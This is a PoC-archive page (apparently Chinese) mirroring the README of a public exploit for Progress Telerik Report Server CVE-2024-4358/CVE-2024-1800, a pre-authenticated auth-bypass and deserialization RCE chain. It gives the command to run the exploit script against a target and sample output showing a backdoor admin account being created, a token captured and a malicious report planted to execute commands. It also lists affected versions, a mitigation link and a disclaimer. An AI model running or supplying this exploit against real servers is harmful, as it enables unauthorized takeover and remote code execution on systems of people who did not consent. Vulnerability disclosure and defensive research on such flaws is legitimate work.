支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%
立即捐款

POC详情: 2ecc09afd92a5b09997f5e5c7e5d9d954fd581c2

来源
https://github.com/sinsinology/CVE-2024-4358
关联漏洞
标题:Progress Software Telerik Report Server 安全漏洞 (CVE-2024-4358)
Description:Progress Software Telerik Report Server是Progress Software公司的一种企业级报表管理和分发解决方案。 Progress Software Telerik Report Server 10.0.24.305及之前版本存在安全漏洞,该漏洞源于未经身份验证的攻击者可以通过身份验证绕过漏洞访问受限功能。
Description
Progress Telerik Report Server pre-authenticated RCE chain (CVE-2024-4358/CVE-2024-1800)
介绍
# CVE-2024-4358 / CVE-2024-1800
Telerik Report Server deserialization and authentication bypass exploit chain for CVE-2024-4358/CVE-2024-1800


## Technical Analysis
[A root cause analysis of the vulnerability can be found on my blog
](https://summoning.team/blog/progress-report-server-rce-cve-2024-4358-cve-2024-1800/
)
![poc](poc.gif)


## Summary
<p align="center">
  <img src="/report server.jpg" />
</p>

# Supported versions?

Basically all of them at the time the exploit was published, for future references, every major/minor versions in the below list:
```
2012
2017
2018
2019
2020
2021
2022
2023
2024
```

## Usage
```plaintext
python CVE-2024-4358.py --target http://192.168.253.128:83 -c "whoami"

(^_^) Progress Telerik Report Server pre-authenticated RCE (CVE-2024-4358/CVE-2024-1800) || Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)
(*) random backdoor username: oelycslyun
(*) random backdoor password: cqgnacxljo
(*) Attempting to bypass authentication
(+) Authentication bypass was successful, backdoor account created
(+) Saving credentials to credentials.txt
(+) Successfully authenticated as oelycslyun with password cqgnacxljo
(*) got token: zfCch_LNv0PyKfe7eBDYKXV70IOotwNQ2p82aX-JHIMCisVnTW9PWWYUKljhcRw5alubNOg_gXoHT6-hJk4VO-jGZuzmisLIi5A
(*) Generated random report name: qvwdycugmc
(*) Creating malicious report under name qvwdycugmc
(*) Deserialization exploit finished

```

## Mitigations
Update to the latest version or mitigate by following the instructions within the Progress Advisory
* https://docs.telerik.com/report-server/knowledge-base/registration-auth-bypass-cve-2024-4358

## Follow Us on Twitter for the latest security research:
*  [SinSinology](https://twitter.com/SinSinology)
*  [SummoningTeam](https://twitter.com/SummoningTeam)

## Disclaimer
This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.
文件快照

 [4.0K]  /data/pocs/2ecc09afd92a5b09997f5e5c7e5d9d954fd581c2
├── [6.1K]  CVE-2024-4358.py
├── [2.1K]  README.md
└── [1.3M]  report server.jpg

0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。